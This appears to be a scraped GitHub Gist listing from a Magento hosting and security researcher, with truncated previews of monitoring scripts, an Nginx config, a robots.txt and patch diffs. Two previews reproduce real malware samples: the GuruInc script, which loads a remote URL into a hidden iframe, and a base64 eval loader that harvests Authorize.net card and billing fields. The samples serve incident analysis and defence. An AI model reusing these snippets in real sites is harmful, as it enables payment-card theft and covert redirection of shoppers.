gwillem
/ iopsmon.sh
Created
September 22, 2015 14:28
Monitor I/O heavy SQL queries and PHP requests on Hypernode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # monitors iops per 30 sec interval, and prints current http and sql transactions if iops avg > 100 | |
| while true; do | |
| iops=$(iostat xvdf -d 30 2 | tail -2 | head -1 | awk '{print $2}' | cut -d. -f1) | |
| if [[ "$iops" -gt 100 ]]; then | |
| echo "-------------------------------------------------------------------" | |
| echo "IOPS: $iops" | |
| echo |
gwillem
/ magento-nginx.conf
Last active
July 29, 2023 10:13
Battle-tested Nginx configuration for Magento (source: www.hypernode.com)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This is an annotated subset of the Nginx configuration from our Magento production platform @ www.hypernode.com | |
| # See https://www.byte.nl/blog/magento-cacheleak-issue | |
| # !!!! If you are a Hypernode customer, do not use this config as it will result in duplicate statements. !!!!! | |
| user app; | |
| worker_processes 4; | |
| pid /var/run/nginx.pid; | |
| events { |
gwillem
/ guruinc-nonobfuscated.html
Last active
October 18, 2016 21:03
Magento GuruInc malware as spotted in the wild (more info @ http://support.hypernode.com/knowledgebase/how-to-fix-guruinc-infection/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| document.addEventListener("DOMContentLoaded", start); | |
| function start() { | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open('GET', 'http://guruincsite.com/1.php', false); | |
| xhr.send(); | |
| if (xhr.status == 200) { | |
| var element = document.createElement('div'); | |
| element.innerHTML = "<iframe src=" + xhr.responseText + " width='1' height='1' frameborder='0'></iframe>", element.id = 'div123'; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git .htaccess .htaccess | |
| index 60e1795..aca7f55 100644 | |
| --- .htaccess | |
| +++ .htaccess | |
| @@ -207,3 +207,28 @@ | |
| ## http://developer.yahoo.com/performance/rules.html#etags | |
| #FileETag none | |
| + | |
| +########################################### |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /index.php/M2ePro/cron/index/ HTTP/1.1 | |
| Accept: */* | |
| Host: xxxx | |
| Cookie: testcookie=ok | |
| User-Agent: M2E Pro Cron Service/1.0 | |
| Content-Length: 325 | |
| Expect: 100-continue | |
| Content-Type: multipart/form-data; boundary=----------------------------3e1c79a414da | |
| ------------------------------3e1c79a414da |
gwillem
/ parse-scans.io.py
Created
November 17, 2015 12:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Parse scan.io archive to find specific HTTP responses. | |
| Will save positive hits to <timestamp>/<ip>.log | |
| Usage: | |
| $ parse-scans.io.py https://scans.io/data/rapid7/sonar.http/20151110-http.gz |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type="text/javascript">eval(atob("dmFyIHNlPWZhbHNlO2Z1bmN0aW9uIHRpbWVkTWUoKXtpZigoIXNlKSYmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdhdXRob3JpemVuZXRfY2NfY2lkJykpKXtmbG49ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6Zmlyc3RuYW1lJykudmFsdWUrJyAnK2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOmxhc3RuYW1lJykudmFsdWU7Y2k9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6Y2l0eScpLnZhbHVlO3M9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6cmVnaW9uX2lkJyk7c3Q9cy5vcHRpb25zW3Muc2VsZWN0ZWRJbmRleF0udGV4dDtjPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOmNvdW50cnlfaWQnKTtjbz1jLm9wdGlvbnNbYy5zZWxlY3RlZEluZGV4XS50ZXh0O2FkPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOnN0cmVldDEnKS52YWx1ZSsnICcrZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2JpbGxpbmc6c3RyZWV0MicpLnZhbHVlO3pwPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaWxsaW5nOnBvc3Rjb2RlJykudmFsdWU7dD1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYXV0aG9yaXplbmV0X2NjX3R5cGUnKTtjdD10Lm9wdGlvbnNbdC5zZWxlY3RlZEluZGV4XS50ZXh0O2NuPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdhdXRob3JpemVuZXRfY2NfbnVtYmVyJykudmFsdWU7Y2VtPWRvY3VtZW50LmdldEVsZW |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import gzip | |
| import csv | |
| import sys | |
| from netaddr import IPNetwork, IPAddress | |
| from collections import defaultdict | |
| from pprint import pprint | |
| """ | |
| 20151129 gwillem@gmail.com | |
| Written to assert Peter Jaaps suspicions about disguised crawlers from competitors |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| User-agent: * | |
| Allow: / | |
| Crawl-delay: 25 | |
| sitemap: http://magentotestpakket.nl/sitemap.xml | |
| Disallow: /*?p= | |
| Disallow: /*&p= | |
| Disallow: /*?price= | |
| Disallow: /*&price= | |
| Disallow: /*?color= |
gwillem
/ patch-7405-for-1.9.2.x.diff
Created
January 21, 2016 10:28
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git app/code/core/Mage/Admin/Model/Observer.php app/code/core/Mage/Admin/Model/Observer.php | |
| index 9c04324..9d39424 100644 | |
| --- app/code/core/Mage/Admin/Model/Observer.php | |
| +++ app/code/core/Mage/Admin/Model/Observer.php | |
| @@ -34,6 +34,7 @@ | |
| class Mage_Admin_Model_Observer | |
| { | |
| const FLAG_NO_LOGIN = 'no-login'; | |
| + | |
| /** |